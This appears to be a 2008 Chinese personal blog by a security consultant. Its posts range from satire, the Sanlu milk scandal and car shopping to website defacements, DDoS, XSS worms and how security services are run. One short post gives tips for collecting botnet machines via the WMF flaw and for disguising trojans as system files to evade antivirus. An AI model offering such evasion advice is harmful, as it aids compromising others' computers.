此安全更新通过更正创建新窗口过程中所通过的窗口属性验证、更正多个线程中系统调用的处理方式以及更正通过用户模式传递到 Windows 内核的参数的验证来解决这些漏洞。
Microsoft 建议客户尽早应用此更新。


最近的补丁真多啊,全是高危漏洞,每个都非常严重。以前那个图形漏洞最厉害,所有的IE都跑不掉,不,应该说所有的windowns用户都跑不掉


2008年10月18日星期六

儿子的犯罪记录

儿子现在10个月,喜欢撕书敲键盘,见了计算机,就猛扑过去。最近因为没拦住,接连干了二件事:
1、前几天头凑到我眼前,非要摸键盘,拗不过他,就让他敲了,一抬头,忽然看到有程序提示:确认删除。。。还没等我取消,一闪而过,直接确认了,到回收站里再看,竟然一点儿也没影子。这小子真狠,竟然用了不可恢复的删除。啥时候学会的?

2、昨天晚上,妈妈正在看贴子,小宝宝又啊呀啊呀地凑过来,摸摸鼠标看里面的红光,赶紧抢下来。他毫不在意,一转手又去抓键盘,把浏览器打开菜单又关上又窗口化,让妈妈没法看贴子。我朝后抱他,使劲向外撑,还要努力扑到键盘,再看屏幕,中间快速地显示出一行字来::
"能奈我何哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵"
也不知道是怎么敲上去的。机器上装的是google的拼音输入法

2008年10月17日星期五

2008年10月13日星期一

让青春继续

http://hi.baidu.com/%C2%EC%D2ϵ%C4%CC%EC%CF%C2/blog/item/a03c6cd0b744b78da0ec9c01.html

小说mp3下载,一部挺有意思的小说

2008年10月10日星期五

奇文妙语,续

却是一件"天庭人口准入制度",不由大喜:"此物一出,全中国人都发抖,正可用来对
付山野村猴,等我丢下去打他一下。观音妹子,这趟功劳要让给我了。"观音娇嗔道:"
讨厌,人家不跟你玩了啦。"老君涎脸笑道:"妹子莫气,这一击若得手,定将此役拍做
主旋律电影,妹子作为主角,由我家女丑女丑扮演,所有院线同时上映,何如?"观音这
才回嗔作喜。


只见老君将那法宝自天门上往下一掼,滴溜溜,可可的着猴王头上一下,将大圣打翻在地
,众天庭公安一拥而上,将大圣捆个结实,再也不能变化。一公安怒道: "这厮令我等吃
了不少苦头,今日一发还了他罢!饶你个孙悟空,今日要将你变做孙志刚!"正待把出手
段,却有另一公安叫道:"且慢,我等老手段土得掉渣,如今时兴与国际接轨,那驻伊美
军虐囚,手段千变万化,何不学得一二,今日做个新鲜耍子?"众公安一听,齐声称妙,
便将大圣押去斩妖台,电击火烧,刀砍斧剁,却伤不得大圣分毫。

玉帝见状,不由踌躇:"这厮这等,这等……如何处治?"老君奏道:"不若与老君领去
,放在八卦炉中,炼出我的丹来,何如?"玉帝闻听大喜,便将大圣赐与老君锻炼。殊不
知大圣神通广大,拔下一根毫毛,变做美钞,贿赂了扇火童子,得知那巽位下有风无火,
前往躲避,未曾受得重伤。


七七四十九日满,老君开炉取丹,却见大圣飞身而出,使金箍棒大杀四方,打得天宫中九
曜星闭门闭户,四天王无影无踪。直打到通明殿前,玉帝见状大惊,忙叫道:"快,关门
,放协警!"原来那协警之徒,比正规警察更凶恶十倍,只见一个个奋勇争先,踊跃咆哮
,将大圣围在垓心,眼看就要拿下。


玉帝正在庆幸,忽见协警们全做了鸟兽散,原来此辈性贪,眼中只有金银,大圣之黄金锁
子甲在炉子中烤得甲环松脱,被众协警一口一撕,顷刻间个个嘴里有片黄金,纷纷跑回后
院掩埋收藏不提。


正没奈何间,忽见西方如来相助,要与大圣赌赛。如来曰:"我有一样法宝,你若能飞出
我这法宝管辖,便让你做了玉帝之位;若飞不出,便缴械投降如何?"说罢自怀中掏出法
宝,悟空定睛看时,却是一个小小本子,上书三个大字:暂住证。便笑道:"一个小小本
子,有何灵能,我去也!"一个跟头飞出,自天空降落北京地界,脚步刚落,便见几名警
察前来:"那个谁,说你呢!暂住证拿出来看看!"悟空一惊,将腰一扭,又一个跟头飞
到广州,正在观望,忽见一群联防冲来:"这个好像没有暂住证,快抓住他!"七手八脚
要拿下大圣,大圣忙分开众手,复又飞起,急切间难辨方向,却又飞回如来面前。如来微
笑道:"我的宝贝何如?"大圣道:"不算!不算!闻听西方有国,不设暂住证,待我去
来!"正要纵身跳出,却被如来手掌一翻,将暂住证变做一座五行山,将大圣牢牢压住。



玉帝见擒了大圣,心中大喜,便邀请如来及有功群臣,备齐饭局麻将、赃款三陪,做了一
个安天大会,盛世联欢。正行乐间,忽有五行山居委会老太来报:"那大圣伸出头来了,
说他要挣脱出去赶招聘会,投简历发名片,谋个职位,以图东山再起哩!"如来道:"不
妨,不妨。"袖中只取出一张帖子,上有六个金字:"此人农村户口。"递与手下,让贴
在那五行山顶上。又向天再借五百年,使那帖子牢牢置顶不得脱落,那座山即生根合缝,
大圣再也无法爬出,自此一压就是五百年不得翻身也

奇文妙语:孙悟空为何被压五行山下?

震惊!孙悟空被压五行山下的真实原因

说孙悟空大闹天宫,观世音菩萨举荐二郎真君降妖,带天兵天将在花果山大战。正斗间,
大圣忽见本营中妖猴惊散,自觉心慌,抽身就走,众天将慌慌张张,前后寻觅不见,一齐
吆喝道:"走了这猴精也!走了这猴精也!"


二郎神圆睁凤目观看,却见下界人烟繁华之处,那大圣变做一个老头,推着一辆三轮车,
抖抖索索地,正在街边卖烤白薯。二郎心中冷笑,正待发标打他,忽然见一伙城管,手持
锤剪棍棒,吆吆喝喝,不由分说,便将三轮车砸得稀烂。大圣一惊,以为是天兵到来,连
忙转过街角,又摇身一变,变做一个小姐,描眉画眼,在那里袅袅婷婷走路。却又被二郎
看个真切,二度意欲发标,迎面却又来了几个公安,劈面揪住大圣道:"定是一个野鸡,
随我局子里走一趟!"大圣心慌,忙道:"我不是野鸡,我还是处女!"公安狂笑道:"
处女怎地?处女便嫖不得娼么?"手铐一抖,便要拿人。大圣见事不谐,忙将腰一扭,腾
空而去,眼见前方一个山凹,便滚下山崖,伏在那里又变,变一座小学,大张着口,似个
校门,牙齿变做门扇,眼睛变做窗棂,抖几个猴虱下来变做学生咿咿呀呀念书。只有尾巴
不好收拾,竖在后面,变做一根旗竿,悬起一条大标语:"百年大计,教育为本;义务教
育,免费入学。"二郎两番被抢了先手,心中正在烦闷,眼看得这条标语,不由笑道:"
是这猢狲了!他今又在那里哄我。殊不知中国号称义务教育,那里有得免费?我也曾见过
学校千万,更不见一个不把学生做摇钱树的,看我打杀这个猴子!"大圣听得心惊,扑的
一个虎跳,又冒在空中不见。


真君望不见大圣踪影,急纵身驾云,起在半空。见那李天王高举望远镜站在云端,呵呵笑
道:"真君,快去!快去!那猴使了个隐身法,走出营围,往你那灌江口去也。"二郎听
说,忙回灌江口来赶。


却说灌江口正开大会,大圣摇身一变,变做一个XX代表,杂在会场之中,指东点西,做踊
跃发言状。正自以为得计,却不料被真君一眼识破:"XX代表向来是泥塑土偶的神像,什
么时候跑出一个活的来?"举着三尖两刃神锋,劈脸就砍。那猴王急忙躲过,使金箍棒相
对。两个嚷嚷闹闹,打出会场,半雾半云,且行且战。


半空中天庭妇联主任观音菩萨与炼丹部长太上老君正在观战。菩萨对老君道:"老君哥哥
,贫僧所举二郎神如何?果有神通,已经那大圣围困,只是未得擒拿。我如今助他一功,
拿下猴头。"老君道:"观音妹子?你将何兵器助他?"观音回身唤过坐骑:"看我开宝
马撞他一下。"老君道:"你那宝马价格甚为昂贵,若撞坏了多有不便。"观音道:"横
竖也是公款,撞了就撞了吧。"老君又道:"那修理起来也甚为麻烦,还是让我来替妹子
助他吧。"观音曰:"坏了就不要了,我正想换辆凯迪拉客。"正拉拉扯扯间,老君身后
转过一名仙娥,乃是有名的张惟英教授,献与老君一件宝物,嘴里喃喃说着什么"总不能
让所有人都来天庭吧……我至今都不认为我错了……"转身而去。老君定睛看时,那宝物

2008年10月9日星期四

收集肉鸡的一种方法

1、使用微软的gdi+wmf漏洞,几乎没机器能挑掉
2、绑定木马时,除了做免杀处理,还要改它的数字签名,MD5值,这个最有效,改成和系统文件一样的,几乎所有的杀毒都无法看出异常。将来一段时间内,也不会被杀掉,手工查杀也比较难发现
另外,现在的rookit也发展了,可以放在cmos,硬盘微码中、甚至电池里面,越做越先进了

这样的肉鸡,怎么着也能用几年吧?

2008年10月5日星期日

国庆节前被人黑掉的几个网站

如是,国庆节前被人黑掉的几个网站:

三鹿:有几个人黑进去,在首页进行了聊天,和以前山东省公安厅的网站网聊似的。不过对于三鹿,相信大家心中自有公道评判。真相是掩盖不住的,新换的老总还想搞过去那一套,和阜阳那样,搞定政府就以为可以万事无忧了,那就低估了广大网民的智商了。
联通:被黑是正常的。他们许多地方都不重视网络安全,以前跟他们沟通过,他们的账务系统,也是非常容易进入的,但他们并不关心。
北大:有人冒充北大校长,发布言论,攻击现行教育制度。怎么说呢,学生的发言权,基本是没有的,算是由此找到一个机会吧。
西南交通大学:大部分学校的安全,基本上都很差,投入很少。
连云港环保局:政府投入倒是挺大,但是经常一番操作后,往往把安全作为一个噱头,并不真正重视。

还有很多,就不一一列举了。

上面是比较典型的几种环境:政府、高校、运营商、企业

到目前为止,我还没有足够的客户群,以后要尽量找机会,给当地这些部门演示,如何容易地就可以进入系统,如何防护,等等

随着经济形势的恶化,相信网络安全这个行业,反而会有更多的机会出现。努力吧

2008年9月30日星期二

关于七八月份潍坊黑客事件的思考

在2008年的7-8月份,潍坊网通发生了大规律ddos事件,据称某周时间内,90%的用户无法上网,影响极大。

比较疑惑:
1、攻击只针对某物流园的服务器进行ddos,会影响全市40万上网用户?潍坊网通的网络规划是不是有问题?
2、攻击持续了整整一周,相关人员毫无对策?只不过是ddos攻击,现在很多机构一说这个,就说完全没办法防护,其实还是有许多办法减轻症状的,甚至大多数的攻击都可以很好地解决。ddos并不是不可治愈的顽症。
3、报道说此物流园由有线改无线,发现无线被人信道破坏,也无法正常提供服务。是后通过查找冲突的信道,定位了犯罪嫌疑人。这个攻击改变的改变,有些无厘头了吧?而且,改为无线提供速度,在网络上不是更容易攻击?即使针对无线的攻击,方法就更多了,何必舍近求远,暴露自己?

总之,这篇报道里面,疑点太多了。真相如何呢?

2008年9月28日星期日

跨站攻击的利用

跨站攻击,现在的发展已经远远超出最初的利用了。

现在已经有很多使用的实例了。针对ajax + 跨站攻击,甚至做出了 web蠕虫病毒,想像力真是丰富,能力真是强呀,以前怎么没想到这么好的一种利用方式呢?

使用json,或者 xmlhttp方法提交数据的ajax特别多,再加上跨站的普遍性,几大网站,国内国际的许多知名网站都在这个名单中,尤其是web2.0的,几乎无一幸免,都会很容易地受到攻击。大家在上网时,请经常关注自己的系统情况

2008年9月23日星期二

刚才需要更正的一个地方

刚才对于笔记本正常开机用时超过24个小时的想法,是不现实的。

手机虽然可以用几天,但大部分时间都在待机,屏幕和计算单元都是不工作的。笔记本电脑待机时,也可以用很长时间。
问题是,一般的手机,打电话都打不了多长时间,很少有超过5个小时的吧?要是光开着屏幕,玩pda功能,有超过一天时间的吗?可能能够支持一天也比较少了,算是很强的电池了。

所以,笔记本电脑要想超过24小时,在不增加电池的情况下,几无可能。最大能支持多长时间呢?通过改过操作系统,关闭用不到的硬件,能处长一倍时间吗?

有没有这种可能呢?

有没有这种可能呢?不用开机引导所有的功能,只要能编辑文档,收发电子邮件的功能,把日常用到的几个功能集成一下,放在笔记本上面使用,开机在几秒钟内实现,最大的开机时间,和手机似的,可以在电池支持下用几天时间。

能做到吗?准备把linux裁剪一下,把机器上用不到的硬件都关掉,能省多少电呢?能支持多长时间呢?要是在普通电池下,能够支持超时24个小时,就很强了吧?

现在待机可以很长时间,经常一晚上不用,放到早上再开机的时候,还有很多电,几乎没有消耗。要是正常开机情况下,也能做到这样就很强了。

准备一个项目,马上开始了。要找出最大量的应用漏洞,风险在哪儿?在别人已经做过安全风险评估的基础上,再去寻找风险,难度大了不少。这样也好,有挑战的乐趣。

2008年9月22日星期一

精彩和智慧

韩寒再一次中午发帖,韩白之争2正式上演


时间:

2008年09月19日

08:16:06

事件:河北省作协副主席谈歌语出惊人:"要是我当韩寒他爹,那下一秒就把他打死。"

原因:热热闹闹的"30省市作协主席小说巡展"遭到以韩寒为代表的年轻作家的否定乃至奚落,众作协掌门开始联手反击。


以下是河南省作协副主席郑彦英先生的文章:《人不能无耻到信口雌黄》


昨天来太行山途中,大河报记者来电话采访我,说韩寒说我在网上与全国30位作协主席一起参加的小说联展,我的《从呼吸到呻吟》标题标题党,今天早晨早起,看了韩寒在上的话,感到很惊讶!

1、韩说我们这些老作家都是靠领悟文件什么的才开始写作,未免太武断,不了解这一批作家不要紧,不要随便给他们下定义,一个轻浮到这种程度的人,肯定连他的父母亲想什么做什么都不知道。当然,他的父母健在不健在,健康不健康我不了解,正因为我不了解,我不会说他的父母自在哪种生活状态。

2、韩说大赛中没有作协主席,张笑天不是吗?起码看一看名单再说话,狂妄自大到连认真看一眼名单都没有的程度,就对这次大赛妄加评论,太自以为是了吧?

3、我过去常在网上看年轻一代的作品,包括韩寒的,我喜欢他们的新锐,他们作品中的一些不尽如人意的地方,我从来没说过,因为我知道他们终究要长到我们的年龄,那时候他们就会很成熟。但是韩寒根本没看我的作品就把我的小说定为标题党,未免太轻率吧。

韩寒回应。注,韩寒一般都是晚上发帖。害的得手机那时常常熬夜,无奈,刷屏太快,咱没那种命啊。

事件:韩寒中午发帖,领悟

原因:估计是回应

郑先生是被评为国家有突出贡献的专家、河南省省管专家,享受国务院特殊津贴专家,获得过冰心文学奖等多种奖励,同时也是河南省文学院的院长。

虽然郑先生是副主席,而且河南省有十二个副主席,但他在名单上是排在正主席之后的第一人,中国那点破规矩,不用干都能看会,所以,他将是现在河南省作协正主席退位以后的河南省作协正主席。我相信郑先生对正主席之位还是有想法的,你看他文章中的第二条就能隐约透露出他的想法。

所以,首先我要承认自己的错误,我居然看漏眼了在你们的名单里还有一位堂堂的正主席张笑天先生。我的确太狂妄自大,没有认真看你们的名册,没发现你们的正主席,臣罪该万死。

臣斗胆说两句,郑先生说,他们这些老作家不是靠领悟文件才开始写作的,那是当然,要不您不就变成新华社的社论员了,您是作家,酒肉穿肠过,文件在你心。你们是在写作的时候时刻领悟着文件。别人我不好说,但郑先生肯定记得,您在转业的时候,被河南省委组织部选为笔杆子,然后到了省委《党的生活》编辑部工作,当然当然,这是无尚的光荣。您还是灵宝市副市长,三门峡日报社总编辑、社长、党委书记,您说您不领悟,我实在不能领悟。

但是我还是得教教笔杆子文章到底应该怎么,至少上面那篇文章,有不少地方可以改进。首先,文章的官腔太浓了,写文章和写文件还是有区别的。其次,"一个轻浮到这种程度的人,肯定连他的父母亲想什么做什么都不知道。当然,他的父母健在不健在,健康不健康我不了解,正因为我不了解,我不会说他的父母自在哪种生活状态。"这种话是很没有意思的,你可能觉得拐着弯骂人很有意思,但你的弯也得拐的大点。在赛车中,你这种拐法是弯道中最没有技术含量可以全速通过的的"假弯",可能你技术差,所以假弯也拐的很吃力,过了假弯很得意,你图了自己一个精神愉悦,但是很容易成文全文的败笔。

至于他的第二条,就已经说过了,这是一个省作协副主席对一个国家作协正主席的马屁,说到这郑先生肯定急了,你这个无知轻浮小儿,我说的那个不是中国作协主席,张笑天那是吉林作协主席,实在是不好意思,一个省十几个副主席一个正主席,全国好几百个作协主席,我实在是搞不清楚。

至于第三条,我实在是见过了很多次,作为写手,虽然我们年龄不同,但是平级的,我不敢说自己是作家,但如果真的以作家论,你是要比我低级的,因为你是国家豢养的。假若税收的取支都是在一个领域内,那就是我交给国家的税发了你的工资。所以说,我是你的衣食父母,你怎能写文章说你爷爷奶奶不好呢。有人可能会说,公务员和领导的工资也是由别人交的税组成的,难道纳税人要大过他们?当然应该是这样的。只是在我们国家不是这样的,我们已经习惯了纳税人是孙子,公仆是爷。

纵观整篇文章,你非常急躁,情绪波动大,动怒太多,芳心方寸同时大乱,明显沉不住气,心态也没调整好,我给你的评价只能是待定。

最后,我要给你个建议,2006年在中央号召大力建设社会主义新农村的大背景下,你领悟到了,出版了科幻读物《郑彦英诗语焦墨画----乡村模样》,在你的文章中,中国的农村无不是一副和谐的大好景象,男耕女织,衣食无忧,官民一心,繁荣富强。

该写的写,不该写的你永远不会写,你领悟的很好。我看好你当选下届中国作协主席。你明明就是郑主席,但却还是个副主席,这对不起你的工作,对不起你的名字。只有郑正主席才配得上你,不要怕,正正是不会得负的,你的位置稳的很

中国资本家与西方资本家的区别

西方资产阶级是通过延长工人劳动时间,掠夺海外殖民地,研发先进生产工具来积累资本的

中国资产阶级是通过作假下毒,恶化劳动环境,污染生态环境,不掠夺,不研发来积累资本的

2008年9月15日星期一

太TMD无耻了,还有天理吗?

2008年9月出了许多事。

三鹿出售的有毒婴儿奶粉。矿难,四川客车事件....现在是9.15,这个月才过了一半。
2008年9月出了许多事。
三鹿出售的婴儿奶粉中,居然有毒物质,导致多名儿童死亡,大量儿童伤害脏器。厂家在3月份就收到相关报告了,但一直隐瞒,到2008年9月份才被揭露出来。三鹿奶粉是国产奶粉中的最大品牌,占销量的20%以上。这么多的有毒奶粉,在这么长时间里,销售到了全国各地。

看看最近的官方报道是如何写的:
中新社石家庄九月十四日电 (记者田张梦高新国)河北省政府十四日对外通报,三鹿重大食品安全事故目前被刑事拘留的十九位犯罪嫌疑人中有十八人是牧场、奶牛养殖小区、挤奶厅的经营者,河北警方正全力彻查。

  十四日,河北省政府召开新闻发布会通报三鹿婴幼儿配方奶粉重大安全事故调查进展情况。河北省公安厅政治处副主任史贵中表示,事发后,警方经过深入调查相继排除流通销售、产品储存、生产加工环节添加三聚氰胺的可能性,将目标锁定原奶及其原材料采购环节。

google一下,可以看到三聚氰胺只是微溶于水,奶农能加到里面吗?加了也溶解不了啊。反倒是加到奶粉里,很难看出来。另外,据三鹿自己说,在生产过程中,光检验程序就有1100多道,这个一眼就能看出来的问题,居然可以在很长时间内没有发现。另外,听说一些很大的品牌奶粉,销量年年增长,牧场却不见增长,这里面会不会有问题?还有个说法,说是为了增加在牛奶蛋白质含量的时候达标,会加上微量三聚氰胺,使数据上浮,就很容易达标了。
如果这样一个事故厂家和政府的领导们都能撇清关系的话,实在是无话可说了

中国的这个行业,让自己搞死了。




2008年9月12日星期五

车展归来

2008年秋齐鲁车展归来
从车展回来,整理一下照的几张照片,也整理一下思路,该买什么样的车,不会被销售忽悠,不会在轰闹的氛围下冲动,不理智地消费。每个人都有自己的情况,买辆车对我来说是大投入,所以必须精打细算,要物有所值,这笔投入必须是划算的。有好几个朋友都和我是一样想的,我们赚点儿钱不容易,好不容易攒那么一点儿,四个轮子就吃掉一块,每月还得不断地喂,就这还得折旧,纯粹是消费品。所以,即使存款能买几辆车了,也得仔细比较,买个实用划算的车。
先说说老三样。最实用的车当属老三样,捷达、富康、桑塔纳。夏利也不错,但车皮太薄,没点儿安全性,有新闻说在高速上时撞了条狗,狗没事,车废了。要是平时车技较好又在市里,夏利N3便宜外形也过的去。老三样里面,每一个都有让人喜欢的地方。结合下来捷达最棒,号称城市小流氓,加速快,省油,空调好,各方面都不错。就是安全性上未知,没在网上找到相关的测试数据。富康的操控性好,同价上配置比大众的车要高一些,奇怪的是,白天看着富康挺好看的,到了晚上,感觉这车挺猥琐。捷达和桑塔纳白天晚上都挺好看。当然,各人审美观点不一样,许多人对老三样的外形感觉不能容忍。其实,我感觉捷达最敏捷,桑塔纳很大气,从哪个角度看上去都很好看。老三样的价格不低,最低7万多,这个价位有许多新车可选。
6万多的车,感觉比较好的有三个:锐欧、雅绅特、雪佛兰乐风、其实奇瑞A5也不错,可以不到6万,前一阵儿我关注过这个车,当时去店里想试驾一把,感觉好的话,一冲动当场就定了,但销售人员坚决不让试驾,必须按照规定来。这个车各项配置挺多,也比较皮实,在国内的碰撞测试中,得分挺高,好像是46分来是多少。但后来在网上,有文章质疑国内碰撞测试的权威性,只是一个企业搞的,交钱就可以有内幕操作,所以也只能做个参考而已,当不得真。但A5的钢板感觉是挺皮实的。销售说是1.2的?感觉不大可信。现在许多车都是0.8吧。怎么会差这么多。A5的加速有点肉,高速超车得降档加油,最看中A518,但得订货都没有现货。据说A3不错,但这个车新推出来,性价比不高,整体可能还不成熟,价位也在8万多。最难忍受的是A5的屁股,导致整体不协调,其实从侧面看,前面也不是很协调。不协调的车,整体跑上速度后,可能会有一些问题,我研究汽车不深,只是觉的万物自有规律,不协调就是某些地方肯定是问题了。捷达那么老的车,为什么看上去还是很协调?纯粹个人感觉,也当不得准。 后来试驾了一把锐欧,让人感觉惊喜,1.4排量居然有这么强的动力,在泥洼里面转了一圈,也没感觉颠。空间、外形都不错。之前没有在网上查相关资料,对它还不了解。看发动机,布置的让人看了很舒心,不象国产的奇瑞、吉利甚至富康,里面的线都很乱,看着就挺晕。档位很清晰平顺,手感挺好,说不定最后就买这个了。另外的两个,乐风有些费油,不过雪佛兰景程那么大的车,据说也就9个油,有些怀疑。雅绅特有些省油,各个方面都比较不错,据另外厂家的销售说,安全性不好,碰撞测试只有一星。基于历来积累的感觉,对日本车和韩国车,都抱着很慎重的态度,除非特别特别吸引人,才会认真调查综合取证,最后才有所考虑。感觉日本车和韩国车,里面有他们民族性格的影子。
8万多车,本来没在考试范围内,但在找长安奔奔的时候,发现他们居然还出个长安志翔,安全性的配置非常吸引人,动力也不错,价位也不错,外形很棒,做工也不错,真的是很吸引人。让销售人员说的我都想马上拍板定了。后来想想,tsc技术会不会是高油耗的一个原因?另外在已经有ebd/aps/气囊等配置外,还能起多大作用?这个价位里面,俊捷的车比较实惠呀,外形很漂亮,里面也不错。以前坐朋友的车,就是感觉有些肉,没有驾试乐趣。我买个车来是开的,又不是摆造型比人看的。那么厚的钢板那么重的车身,也够难为那小发动机了。油耗也不低。
对了,上面6万多的车,怎能不掉比亚迪F3?这个车配置、外形等各个方面也不错,这么低的价格,在各个车型里面算是最高性价比了。后来看网上有人说,安全性很差。我表姐开了一辆,听说还不错。外观很讨人喜欢,配置也很棒。有空去试驾感受一棒。要是好的话,也在考虑之列 。
5万多的,旗云很不错,网上也有大量的文章。不过看上去象捷达,各个方面和捷达比较的话,整体性价比较高。外形也显的比较老重,从远了看,象是一个40来岁喜欢抽烟的男人。还有吉利,5万多里面,有个金刚很漂亮,刚出了个金鹰,屁股有些刚硬,但整体看上去还不错,挺吸引人,可惜是个两厢。家里不错,商务用途是不是有些不着调?金刚各方面不错,有空去试驾,也在考虑之列。不过比金刚各方面都好一些的远景更好,也是很吸引人,价位在7万5,恩,一下了贵了不少,不过外形更漂亮大气,配置更好,而且是全铝发动机。金刚是铸铁发动机,1.5的排量比远景实际却省不了多少。5万多的车里,上海华普有许多,外形也不错,配置也挺好,钢板厚度据说1.1。以前对这个牌子不了解。要是和也用吉利的配件和生产线,应该会不错。

10多万的车太多了,好车也太多了,就象贵和银座的衣服,看着感觉不错的,只要凑上去看看价位,也让人感觉很high。307很安全,10多万就能买到。focus福克斯10多万也能拿到。还有马六,凯旋,尼桑里面的什么达来着,对了,还有好多的SUV,对我们年轻人来说最有吸引力。雅力士、飞度也不错,但我持保留态度,日本韩国的车,除非好的一踏糊涂又便宜的一跳糊涂,才可能打动我。但这样的情况可能吗?
小车里面,Qq, qq6,长安奔奔,长城精灵,哈飞路宝,要只是上下班做个家用什么的,足够了,买个大车用的上吗?现在有个车还很有面子吗?谁家还买不起个车呀,每天只是个上下班,有个代步工具就行了,多烧那些油多花那些钱干嘛?不过小车的价钱再稍微加点儿,就能买个象样点儿的车, 五六万里面性价高最高,再往上加点儿配置增点儿空间,到十多万,就能买个不错的车,二十万以上,就能讲点儿品位了,再往上的,咱就不敢想了,看着那些好车,谁不馋啊?还得等咱赚了钱再说吧。几千万的车都有,那些东西,买点就象骗点一样,一个买点就顶若干辆好车,顶级的钱都是这么赚的吧。中国人瞎烧包,不吃饭也要买名牌,有钱的不知道钱怎么来的,要不然,怎么会消费掉全世界那么多的高级奢侈品呢?
             虽然写了这么多,折子上还放着些活期,但买车对我来说,还没有那么大决心。赚钱不易,有必要现在就买车吗?



2008年9月6日星期六

几个有意思的东西

有几个挺有意思的东西,有时候见识一下:

山寨笔记本电脑,据说配置还不低,虽然有些粗糙,但价格不到一千元,很有杀伤力吧,可能会对轻笔电有影响。说实话,现在用x60s我觉的就太小了,屏幕看着难受,外接大屏幕感觉才稍好些。要是用轻型笔电,对心理和健康都是严重的摧残,不大感兴趣。

SSD硬盘,有个32GB的固捷,也不到一千,选择真是越来越快了。开机启动,运行着大软件,会感觉非常快,非常有吸引力。但我现在基本采用休眠,启动也是一二秒之间,速度飞快,省电要紧,还是不花这个钱了。

汽车办公室,有空了解一下。
家电风力/太阳能发电机,是个有趣的东东。
usb手感非常好的小键盘,只要25块?看来我现在用的这个买贵了啊,不过德国的小樱桃键盘可遇不可求,贵点就贵点吧,已经用这个键盘敲了不少字,也算值了.

2008年9月4日星期四

安全服务的思考

你在火车上的时候,我跟王博士通过邮件,聊了很多。现在的安全服务,应该如何做呢? 依据标准和一些成熟的操作方法,能找出潜在的风险和各类问题吗?用户关注的问题解决了吗?还是被我们引导转移了?通过我们的努力,能让用户的信息资产,更好地发挥作用了吗?
我觉的,现在我们做的,都没有解决好这些问题。用了这么大的投入,是不是一做完,就不会发生损害,或者发生前能够预知风险吗? 老感觉里面遗漏了什么东西。当然,比国内其它安全公司来说,靳兄经验老道,最全面最深入,我无论如何努力,也无法做到这么好的效果。但这里面,我觉的主要的疑惑,现在的安全防护模式,其实是有很大问题吧。如果安全防护模式不完备,评估能做到什么程度呢?有多少人在研究更好的安全防护模式?有多少公司掌握了攻与防的精粹?现在什么模式能有效的检测攻击,抵御攻击,有效地进行系统防护?一千多万种病毒,杀毒软件靠特征码能解决多少?新病毒呢?防火墙更不用说。了,在新的攻击方法下,作用更来更小,尤其注入、跨站一类的攻击,防火墙基本毫无作用。。。。。。。

前几天晚上做梦,想了一种很好的模式,可惜现在怎么也想不起来了,是怎么来着呢?
瞎想一下吧,思考使人清爽嘛

对安全服务的一点儿补充

将客户分层次不是重点,针对用户的信息资产,那些产生价值的信息资产,会有哪些风险?怎样保护这些信息资产?包括人与信息资产的影响,信息资产对人的价值,我觉的最有价值的地方在这儿。

你说的度量,无论管理还是CVE漏洞都不是根本,根本在于,风险是什么?其实是对计算性资产所产生价值的影响。我不是说全面整体的评估不重要,而是针对这一切,还有一些更加丰富的呈现方式。包括依据标准的工具、文档、操作方法、技术细节。。。

老哥的评估方法,老感觉里面遗漏了什么东西。当然,比国内其它公司来说,是最全面最深入的,我去做也做不到这么好的效果,但可能我能找到遗漏的一些地方,比如做完某次评估,我可能还能使用评估结果之外的一些方法,损害影响到系统。 从这个角度说,评估并没有完全解决客户问题。


什么是最大风险呢?从操作上来说,信息资产会产生哪些价值,我可以如何影响(破坏)它,所有的可能都是风险。这样理解是不是更容易操作些?
CVE漏洞不重要,许多系统,从技术上没有漏洞,但还可以通过正常的操作,找到破坏的途径,比如国内的淘宝、支付宝,相信他们在安全上投入也挺大吧,但通过正常操作,也能搞一些很大的破坏。这不能不算风险吧?
做安全服务的客户会有哪些?只要是依赖于计算机和网络,从中产生利润,产生价值的用户,都有安全需求,解决他们的问题,会非常有价值。他们最关心什么? 评估:信息资产创造价值,有哪些因素会影响它? 安全服务的目的,就是为了让这些资产发挥最大效力,保证功能正常、可用、持续,最终产生价值或者利润。这算是客户的本原和最关注的问题吗?

安全评估应该如何去做呢?

最近哥们儿过来,和他交流的非常多。有个疑问,按照老靳的做法,一番折腾的安全评估,到底能解决多少问题?这样铺开后,那么多繁琐的工作,那么大的工作量,能抓住重点吗?能解决用户面临的最迫切问题吗?

我现在为一些客户提供的服务,依照标准的广度,和技术的深度,可以在很短时间内,拿出一个东西,非常有针对性,这样在第一步中,先解决最大风险最大问题,再依照标准流程,慢慢挖掘背后的各种风险,按照客户的投入程度,做到什么程度,但会到没发现的各种可能性和风险,对业务和利润可能的损害说清楚,让用户去衡量安全服务的价值。从这个角度,我的工作,能真正解决客户的问题,是有足够价值
的。

哥们儿的公司服务体系非常庞大,覆盖非常全面,但在项目初期,就与客户界定评估目标,仅有几个系统中挖掘问题,忽略边界、旁路及其它系统、数据、人员操作对目标产生的影响,我觉的虽然显的工作非常漂亮,产生了许多漂亮动人的文档,但最终能解决客户问题了吗?能解决到什么程度?还没有其它潜在风险?评估效果的生命周期多长?。。。。。怎样才能让我们的劳动更有价值呢? 我们能不能解决真正解决客户面临的问题? 怎么才会让我们的业务更有生命力?让我们的公司更有生命力?

2008年8月31日星期日

越来越坏了

这帮人越来越坏了

现在都去怎么控制机器,蠕虫病毒并不是不用了,还有网站挂马也是有效的手段,不过,针对互联网上的视频、MP3利用,正变的越来越多了。

有许多起着吸引名字的电影、歌曲,都加了代码,里面有url,有下载地址,可以把远程的木马拖下来,隐藏在你的机器中,等着控制者的进一步指令。

这种方法以前都使用过,不过,这个暑假期间,用的特别泛滥,相信有人又建立了一大批的肉鸡。只能说,有许多人越来越坏了,安全保护却一直处于落后,许多的地方,经过多年,一直未变,还是杀毒软件+防火墙的安全防护模式。其实,我已经看到了一些后果,怎么就想不到一种商业模式,把我的安全服务推广开来呢?

自己的思路才有才

很有才的一段视频 http://v.youku.com/v_show/id_XMzY4NTE5MDQ=.html

最近针对一些系统的测试,有些先从正常访问的角度看看,其实用不到太多复杂的方法,只要影响到系统的正常业务功能和流程了,也算是成功的一次渗透攻击过程。
原来的渗透攻击,每次搞下来,几乎是全副武装了,有好的机器,带宽,想法,准备,精力等等,总要准备的万全开始动手,争取有成果。现在看一些保护很好的系统,其实完全可以在正常访问的过程中,操作一些东西,影响到它正常的功能和业务,这样也算是达到目的。企事业单位最担心,也是最有价值的,就是系统在业务上的功能承载,最终再到利润和影响(信誉)的呈现。天下之事,莫外名利。

     还是原来的想法,远离酒场远离官僚,保持自己的想法,和追求的方向,这样的人生才更加快乐一些。

2008年8月29日星期五

电子书阅读

